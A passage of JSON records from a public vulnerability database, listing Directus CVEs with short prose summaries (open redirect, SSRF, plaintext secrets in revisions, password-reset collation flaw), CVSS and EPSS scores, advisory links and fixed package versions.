11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.02996","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.02984","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441"},{"reference_url":"https://github.com/advisories/GHSA-ph52-67fq-75wj","reference_id":"GHSA-ph52-67fq-75wj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ph52-67fq-75wj"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj","reference_id":"GHSA-ph52-67fq-75wj","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:06Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35441","GHSA-ph52-67fq-75wj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bc42-4j4d-tudj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71608?format=json","vulnerability_id":"VCID-bg96-h5bt-xfbb","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus is vulnerable to an open redirect via the redirect query parameter on the /admin/tfa-setup page. When an administrator who has not yet configured Two-Factor Authentication (2FA) visits a crafted URL, they are presented with the legitimate Directus 2FA setup page. After completing the setup process, the application redirects the user to the attacker-controlled URL specified in the redirect parameter without any validation. This vulnerability could be used in phishing attacks targeting Directus administrators, as the initial interaction occurs on a trusted domain. This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05352","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05334","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411"},{"reference_url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"GHSA-q75c-4gmv-mg9x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"GHSA-q75c-4gmv-mg9x","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T13:36:55Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35411","GHSA-q75c-4gmv-mg9x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bg96-h5bt-xfbb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/135972?format=json","vulnerability_id":"VCID-bsua-aktm-1qfd","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45895","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.4604","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492"},{"reference_url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff","reference_id":"ff53d3e69a602d05342e15d9bb616884833ddbff","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff"},{"reference_url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.23.0","reference_id":"v9.23.0","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.23.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/32456?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-f3pv-2cf5-3bg8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/393033?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-f3pv-2cf5-3bg8"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-26492","GHSA-j3rg-3rgm-537h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bsua-aktm-1qfd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/72964?format=json","vulnerability_id":"VCID-d8vm-nuff-uffc","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.0975","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.098","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943"},{"reference_url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"GHSA-mvv8-v4jj-g47j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"GHSA-mvv8-v4jj-g47j","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"v11.17.0","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39943","GHSA-mvv8-v4jj-g47j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d8vm-nuff-uffc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/166999?format=json","vulnerability_id":"VCID-eb1b-zvas-muey","summary":"Directus is a free and open-source data platform for headless content management. The Directus process can be aborted by having an authorized user update the `filename_disk` value to a folder and accessing that file through the `/assets` endpoint. This vulnerability has been patched and release v9.15.0 contains the fix. Users are advised to upgrade. Users unable to upgrade may prevent this problem by making sure no (untrusted) non-admin users have permissions to update the `filename_disk` field on `directus_files`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031","reference_id":"","reference_type":"","scores":[{"value":"0.0026","scoring_system":"epss","scoring_elements":"0.49626","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0026","scoring_system":"epss","scoring_elements":"0.49762","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031","reference_id":"CVE-2022-36031","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031"},{"reference_url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/26040?format=json","purl":"pkg:npm/directus@9.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-9t8b-59vc-kbea"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0"}],"aliases":["CVE-2022-36031","GHSA-77qm-wvqq-fg79"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eb1b-zvas-muey"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55903?format=json","vulnerability_id":"VCID-eyv5-91cq-pyf9","summary":"Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons. This vulnerability is fixed in version 10.8.3.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295","reference_id":"","reference_type":"","scores":[{"value":"0.00604","scoring_system":"epss","scoring_elements":"0.7008","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00604","scoring_system":"epss","scoring_elements":"0.7017","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295"},{"reference_url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919"},{"reference_url":"https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295","reference_id":"CVE-2024-27295","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295"},{"reference_url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29477?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27295","GHSA-qw9g-7549-7wg5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eyv5-91cq-pyf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71620?format=json","vulnerability_id":"VCID-ga3s-595f-2keq","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. This vulnerability is fixed in 